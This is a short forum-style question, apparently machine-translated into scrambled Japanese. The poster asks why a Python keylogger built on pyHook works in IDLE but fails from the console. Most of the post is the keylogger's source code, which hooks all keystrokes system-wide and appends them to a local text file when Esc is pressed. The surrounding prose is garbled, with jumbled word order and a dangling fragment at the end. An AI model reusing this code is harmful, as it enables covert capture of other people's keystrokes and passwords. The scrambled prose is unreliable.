では動作しません私はIDLEで実行すると、それだけで正常に動作しますが、コンソールにそれはdoesnのログをファイルに書き込みます。Pythonスクリプトは、私はPythonで、この単純なキーロガーを作るしようとしているIDLEで動作しますが、コンソール
import pyHook, pythoncom, sys
log = ''
def OnKeyPress(event):
global log
log += chr(event.Ascii)
if event.Ascii == 27: # if user press esc
with open('teste27.txt', 'a') as f:
f.write(log)
f.close()
sys.exit(0)
#instantiate HookManager class
new_hook = pyHook.HookManager()
#listen to all keystrokes
new_hook.KeyDown = OnKeyPress
#Hook the keyboard
new_hook.HookKeyboard()
#start the session
pythoncom.PumpMessages()
エラーが見つかりました。 –